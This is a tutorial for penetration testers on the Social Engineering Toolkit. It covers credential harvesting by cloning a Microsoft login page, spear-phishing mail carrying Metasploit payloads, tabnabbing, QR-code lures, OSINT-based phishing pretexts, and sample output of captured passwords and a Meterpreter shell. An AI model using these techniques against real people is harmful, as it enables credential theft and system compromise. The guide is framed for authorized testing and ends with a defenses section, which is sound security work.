
Social Engineering Toolkit (SET) Tutorial for Pentesters

Learn to use the Social Engineering Toolkit (SET) for authorized phishing simulations, credential harvesting, and spear-phishing campaigns.


The Social Engineering Toolkit (SET) is an open-source Python framework designed specifically for social engineering attacks during authorized penetration tests. Created by TrustedSec’s Dave Kennedy, SET automates the creation of phishing pages, spear-phishing emails, credential harvesters, and malicious payloads — turning what used to be multi-hour manual setups into a matter of minutes. This guide covers the most practical SET attack vectors for authorized security assessments.

Important: SET is only legal to use on systems and users you have explicit written authorization to test. Unauthorized phishing, credential harvesting, or malware deployment is a serious criminal offense. Always obtain signed authorization before any engagement.

Installing SET

SET comes pre-installed on Kali Linux and Parrot OS. To install on other systems:

git clone https://github.com/trustedsec/social-engineer-toolkit
cd social-engineer-toolkit
pip install -r requirements.txt
sudo python setup.py

Launch SET:

sudo setoolkit

Or simply:

sudo se-toolkit

You are greeted with a numbered menu system:

 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

The SET Configuration File

Before running any attack, review and configure SET’s options:

sudo nano /etc/setoolkit/set.config

Key settings:

# Path to the Metasploit Framework install that SET calls for payload generation
METASPLOIT_PATH=/usr/share/metasploit-framework
AUTO_BLACKOUT=OFF
# Directory where the credential harvester writes captured logins
HARVESTER_LOG=/var/www/
# Serve cloned pages through Apache instead of SET's built-in web server
APACHE_SERVER=ON

If you plan to use the Apache-based credential harvester, ensure Apache is running:

sudo systemctl start apache2

Attack Vector 1: Credential Harvester

The Credential Harvester clones a legitimate website and captures any credentials entered into the fake login form. This is the most common SET attack vector in authorized phishing assessments.

Navigation path:

1) Social-Engineering Attacks
→ 2) Website Attack Vectors
→ 3) Credential Harvester Attack Method
→ 2) Site Cloner

Step-by-step walkthrough:

  1. Select option 1 (Social-Engineering Attacks) from the main menu
  2. Select option 2 (Website Attack Vectors)
  3. Select option 3 (Credential Harvester Attack Method)
  4. Select option 2 (Site Cloner)

SET will ask for your IP address (for the POST back):

Enter the IP address for POST back in Harvester/Tabnabbing: 192.168.1.100
Enter the url to clone: https://login.microsoft.com

SET clones the login page and starts a web server. Any credentials entered on the fake page are captured and displayed in your terminal:

[*] Credential Harvester is now listening...
[*] We captured credentials:
Username: user@company.com
Password: Sup3rS3cur3!

Delivering the link: In an authorized assessment, you would email this URL (e.g., http://192.168.1.100) to the target users after disguising it with a custom domain or URL shortener per your rules of engagement.

Attack Vector 2: Spear-Phishing Email Campaign

SET can compose and send targeted phishing emails with malicious attachments or links directly from its interface.

Navigation path:

1) Social-Engineering Attacks
→ 1) Spear-Phishing Attack Vectors
→ 1) Perform a Mass Email Attack

Steps:

  1. Select the payload type (SET integrates with Metasploit to generate payloads)
  2. Choose a file format for the attachment (PDF, Office document, etc.)
  3. Configure your SMTP relay or use the built-in mailer

Using a custom SMTP relay (recommended for deliverability):

When prompted, choose option 2 (your own SMTP server). Configure with your authorized mail relay:

FROM Email Address: it-helpdesk@company-internal.com
TO Email Address: target@company.com
Subject: Action Required: VPN Certificate Renewal

SET will format and send the email with your configured payload attached.

Attack Vector 3: The Phishing Page with Tabnabbing

Tabnabbing is a more sophisticated technique — the malicious page looks normal at first, but when the user switches tabs and returns, it silently replaces itself with a fake login page:

1) Social-Engineering Attacks
→ 2) Website Attack Vectors
→ 3) Credential Harvester Attack Method
→ 3) Tabnabbing Attack Method

Configure exactly as with the site cloner — provide the page to clone and your listener IP.

Attack Vector 4: Multi-Attack Web Vector

This vector serves several payloads (Java applet, browser exploit, credential harvester) from one landing page on a single web server:

1) Social-Engineering Attacks
→ 2) Website Attack Vectors
→ 1) Java Applet Attack Method

This approach serves multiple exploit vectors from one URL, increasing the chance of success against diverse browser environments.

Attack Vector 5: QRCode Attack Vector

Generate a QR code that points to your malicious page — useful for physical social engineering scenarios (printing and leaving QR codes in offices):

1) Social-Engineering Attacks
→ 9) QRCode Generator Attack Vector

Enter the URL of your credential harvester or phishing page, and SET generates a printable QR code image.

Integrating SET with Metasploit

SET’s most powerful feature is its deep Metasploit integration — it can generate reverse shell payloads and set up multi-handler listeners automatically:

1) Social-Engineering Attacks
→ 1) Spear-Phishing Attack Vectors
→ 1) Perform a Mass Email Attack
→ 1) File Format Exploits
→ (Select a payload, e.g., PDF Adobe util.printf())

SET calls Metasploit to generate the payload, wraps it in the chosen document format, and starts a listener:

[*] Sending payload to Metasploit...
[*] Payload delivered
[*] Starting the listener...
msf exploit(handler) > 
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.50:51234)

Building a Realistic Phishing Pretext

Technical setup is only half the battle. The pretext — the story you build around the phishing email — determines success. Effective authorized phishing campaign pretexts include:

Pretext                          Why It Works
IT helpdesk password reset       Creates urgency; everyone uses IT
VPN client update required       Implies security risk if ignored
Benefits enrollment deadline     Time pressure + personal relevance
Package delivery notification    High volume; people expect them
CEO/executive message            Authority-based compliance
DocuSign signature request       Common in business workflows

Spear-phishing narrows the pretext to a specific individual using OSINT gathered about them:

Hi [Name],

Following up on your recent support ticket #[Real Ticket Number] regarding 
your Salesforce access issue. Please click the link below to verify your 
credentials and restore access before end of business today.

The inclusion of real details (ticket numbers from OSINT, manager’s name, project names from LinkedIn) dramatically increases click-through rates in authorized assessments.

Measuring Campaign Results

For authorized phishing simulations, tracking metrics helps the client understand their exposure:

Metric                       Description
Delivery rate                % of emails that reached inboxes
Open rate                    % of recipients who opened the email
Click rate                   % who clicked the link
Credential submission rate   % who entered credentials
Report rate                  % who reported it to IT security

SET logs credential captures in real time. For full campaign tracking, consider using a dedicated phishing platform like GoPhish (covered separately) alongside SET for payload generation.
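The rates in the metrics table can be computed from a merged campaign event log. The following is an added example, not code from SET or from this tutorial; it assumes events arrive as (timestamp, recipient, event) tuples (a constructed format), counts each recipient once per stage, and uses delivered mail as the denominator for every rate except delivery.

```python
# Added example (not SET's own code): phishing-simulation funnel metrics from
# a constructed (timestamp, recipient, event) log merged from your mailer and
# SET's harvester. Each recipient counts once per stage; a submission implies a
# click and an open; every rate except delivery uses delivered mail as its base.
from collections import defaultdict

STAGES = ("delivered", "opened", "clicked", "submitted", "reported")

# Constructed sample: one bounce, one duplicate submission, one submission
# with no click event logged, and one reporter who never clicked.
EVENTS = [
    ("2024-05-01T09:00", "alice@example.com", "delivered"),
    ("2024-05-01T09:00", "bob@example.com", "delivered"),
    ("2024-05-01T09:00", "carol@example.com", "delivered"),
    ("2024-05-01T09:00", "dave@example.com", "bounced"),
    ("2024-05-01T09:00", "erin@example.com", "delivered"),
    ("2024-05-01T09:05", "alice@example.com", "opened"),
    ("2024-05-01T09:06", "alice@example.com", "clicked"),
    ("2024-05-01T09:07", "alice@example.com", "submitted"),
    ("2024-05-01T09:07", "alice@example.com", "submitted"),
    ("2024-05-01T09:10", "bob@example.com", "opened"),
    ("2024-05-01T09:11", "bob@example.com", "reported"),
    ("2024-05-01T09:20", "carol@example.com", "submitted"),
    ("2024-05-01T09:30", "erin@example.com", "opened"),
    ("2024-05-01T09:31", "erin@example.com", "clicked"),
]

def funnel(events):
    """Map each stage to the set of unique recipients who reached it."""
    who = defaultdict(set)
    for _ts, rcpt, ev in events:
        if ev in STAGES:
            who[ev].add(rcpt)
    who["clicked"] |= who["submitted"]  # cannot submit without clicking
    who["opened"] |= who["clicked"]     # nor click without opening
    return who

def rates(events):
    """Return the five percentages from the metrics table, to one decimal."""
    who = funnel(events)
    n_sent = len({rcpt for _ts, rcpt, _ev in events})
    n_delivered = len(who["delivered"])
    def pct(n, d):
        return round(100.0 * n / d, 1) if d else 0.0  # empty campaign -> 0.0
    return {
        "delivery_rate": pct(n_delivered, n_sent),
        "open_rate": pct(len(who["opened"]), n_delivered),
        "click_rate": pct(len(who["clicked"]), n_delivered),
        "credential_submission_rate": pct(len(who["submitted"]), n_delivered),
        "report_rate": pct(len(who["reported"]), n_delivered),
    }
```

The per-stage recipient sets from funnel() are also what you hand over in the debrief, since they show who needs follow-up training rather than just a percentage.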

Defending Against SET-Style Attacks

Understanding SET’s techniques helps defenders configure better controls:

  • Email filtering: Configure SPF, DKIM, and DMARC; enable sandboxed attachment scanning
  • Security awareness training: Run regular simulated phishing to train employees to recognize and report suspicious emails
  • MFA everywhere: Even captured credentials are useless if MFA is enforced
  • DNS filtering: Block known phishing infrastructure at the DNS layer
  • Browser isolation: Remote browser isolation prevents malicious page execution
  • Incident response playbook: Ensure employees know exactly who to notify when they suspect a phishing attempt

Summary

The Social Engineering Toolkit remains one of the most comprehensive platforms for simulating real-world social engineering attacks in authorized red team engagements. Its credential harvester, spear-phishing capabilities, and Metasploit integration give security professionals the tools to realistically test an organization’s human and technical defenses. Always pair SET campaigns with proper authorization documentation, defined scope, and a debrief session to help the organization understand and remediate their exposure.
